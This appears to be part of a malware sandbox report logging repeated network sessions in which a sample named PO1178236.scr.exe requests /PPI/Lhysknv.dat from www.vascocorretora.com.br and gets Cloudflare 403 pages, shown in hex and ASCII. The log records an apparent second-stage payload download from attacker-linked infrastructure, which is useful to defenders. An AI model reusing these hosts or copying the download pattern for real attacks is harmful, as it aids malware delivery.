        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:56 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:56 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:56 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 35 36 34 66 39 39 64 65 39 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2564f99de96</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:56 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 35 36 34 66 39 39 64 65 39 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2564f99de96',t:'MTczNjQwODIxNi4wMDAwMDA='}
        2025-01-09 07:36:56 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        97192.168.2.949806188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:56 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:56 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:11 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HoY%2FkqHvslayUVpp6DZoejhMWLVWY9f3h4OpVTEfqdB8%2Ff3vqpyfRuW5BetktGihOQfm9CbGT5rs20bLED9KfaGru3%2F5y1y08eirfAFPUmX73F8M%2BzhHeFGnrQifaNKOaf2C2AwE10Ncj82c"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c25a1bba433d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2338&min_rtt=2336&rtt_var=880&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1240441&cwnd=252&unsent_bytes=0&cid=47a36a094169e8c1&ts=146&x=0"
        2025-01-09 07:36:56 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:56 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:56 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:56 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 35 61 31 62 62 61 34 33 33 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c25a1bba433d</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:56 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 35 61 31 62 62 61 34 33 33 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c25a1bba433d',t:'MTczNjQwODIxNi4wMDAwMDA='};var
        2025-01-09 07:36:56 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        98192.168.2.949807188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:57 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:57 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:57 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:12 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5PMLH%2BbhMKFmo%2BMq7y4TWwCuXYyYnhXClKxJwmTrpIfgwqQ6ll8uOAlxS1C5CN2WvDDeBuMQY4N6cnVZDC0qg%2FR13FcGa5Y34Mbq%2BTuXLOFkEgqfJeb2MU0FnNh6W8jK%2BNhamfM3rVDe6vc"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c25ddfd2422d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1666&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1683967&cwnd=232&unsent_bytes=0&cid=4a05c57b0731d521&ts=147&x=0"
        2025-01-09 07:36:57 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:57 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:57 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:57 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 35 64 64 66 64 32 34 32 32 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c25ddfd2422d</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:57 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 35 64 64 66 64 32 34 32 32 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c25ddfd2422d',t:'MTczNjQwODIxNy4wMDAwMDA='}
        2025-01-09 07:36:57 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        99192.168.2.949808188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:57 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:57 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:57 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:12 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMVaa8j4n%2Bz5lC%2FmbxBKvvShOW0Bt1vfePPF7VTh0Accjle%2F3s8IlxjTHzYwO6noBeBWvzAdst0XW3PNsL4kyqmWHOHjOUhOJuEMHmTIbGTmR1gH9DQ%2BwUQ%2BDc0JdJvo8I857G2Wy5FaYyBp"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c261bb934392-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1574&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1692753&cwnd=234&unsent_bytes=0&cid=f524e06f0eea3a5d&ts=125&x=0"
        2025-01-09 07:36:57 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:57 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
